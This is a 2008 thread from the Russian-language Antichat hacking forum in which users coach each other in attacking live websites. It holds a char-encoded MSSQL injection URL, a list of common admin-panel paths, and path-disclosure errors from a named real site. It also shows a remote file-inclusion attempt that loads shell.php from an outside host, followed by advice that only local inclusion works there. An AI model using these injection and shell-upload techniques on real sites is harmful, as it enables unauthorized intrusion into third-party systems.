ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1461  
Старый 30.03.2008, 15:29
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

удобнее хексить, но и charить можно, только не как в мускуле, а каждый сисмвол в отдельную функцию соединяя плюсам, в гет запросах %2B:
http://www.xxx.com/number.asp?id=45509+or+1=(select+top+1+table_name+ from+information_schema.columns+where+column_name= char(112)%2Bchar(97)%2Bchar(115) и т.д кстати ты перед -- скобку) пропустил
__________________
Карфаген должен быть разрушен...
 

  #1462  
Старый 30.03.2008, 16:25
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

2 Scipio
Хм, а хексить как ? А то через чар таким образом муторно =/
 

  #1463  
Старый 30.03.2008, 16:33
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

я обычно SIPT пользую так как стоит у меня, а вобще таких прог много:
http://forum.antichat.ru/thread24918.html
__________________
Карфаген должен быть разрушен...
 

  #1464  
Старый 30.03.2008, 19:31
Климент_Ворошилов
Новичок
Регистрация: 08.12.2007
Сообщений: 21
Провел на форуме:
347718

Репутация: 36
По умолчанию

Вопрос такой. Возможно ли определить наличие таблицы не используя union? То бишь я предполагаю, что в БД есть таблица, ну к примеру admin, можно ли определить есть такая таблица или нет?
Заранее мерси всем ответившим.
 

  #1465  
Старый 30.03.2008, 19:34
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию

Цитата:
Вопрос такой. Возможно ли определить наличие таблицы не используя union? То бишь я предполагаю, что в БД есть таблица, ну к примеру admin, можно ли определить есть такая таблица или нет?
Заранее мерси всем ответившим.
Нет
__________________
..
 

  #1466  
Старый 30.03.2008, 19:48
Sharingan
Участник форума
Регистрация: 05.05.2007
Сообщений: 171
Провел на форуме:
1050662

Репутация: 435
Отправить сообщение для Sharingan с помощью ICQ
По умолчанию

Как не заливая шелла найти админку, мож кто адреса админок самые такие популярные скинет ?
 

  #1467  
Старый 30.03.2008, 19:53
ReVOLVeR
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316

Репутация: 327
По умолчанию

www.ru/admin/
www.admin.site.ru/
www.ru/adm/
www.ru/administrator/
www.ru/pma/
www.ru/PhpMyAdmin/
....
 

  #1468  
Старый 30.03.2008, 20:51
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Есть инклуд на сайте,с раскрытием пути.

http://rusxmms.sourceforge.net/index.php?page=home/groups/r/ru/rusxmms/htdocs/index.php

Warning: main(gaga.php): failed to open stream: No such file or directory in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39

Warning: main(): Failed opening 'gaga.php' for inclusion (include_path='.:/usr/local/share/pear') in /home/groups/r/ru/rusxmms/htdocs/index.php on line 39

Вопрос: Как определить, статическое значение здесь или переменное? (нубский вопрос,но инклуды я ещё ниразу не юзил:РР). И ещё- можно ли её эксплуатировать(залить шелл на хостинг и перенаправить), если там не работает запрос HTTP вида

http://rusxmms.sourceforge.net/index.php?page=http://iadebilko.ru/padonag/shell.php

.Выдаёт Access Denied! - аналогично, если в файл передавать различные символы).

P.S. Пожалуйста, разъясните всё подробно - гайды читал,но многого не понял. Но это стопудо не глобальный инклудинг, ибо на GET- запросы ему тоже насрать - http://rusxmms.sourceforge.net/index.php?page=http://rambler.ru?

В этом случае бы просто расширение .xxx, в данном случае - php, отбросилось бы как гет параметр и я бы перешёл на рембелр ру.

Последний раз редактировалось Велемир; 30.03.2008 в 20:58..
 

  #1469  
Старый 30.03.2008, 20:52
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

на сурсфордже url access disabled, то есть можно инклудить только локальные файлы
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 

  #1470  
Старый 30.03.2008, 20:59
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Цитата:
Сообщение от blackybr  
на сурсфордже url access disabled, то есть можно инклудить только локальные файлы
Эмм... а как ты узнал?:Р И,в таком случае, как здесь использовать локальный инклуд? (о.О).
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ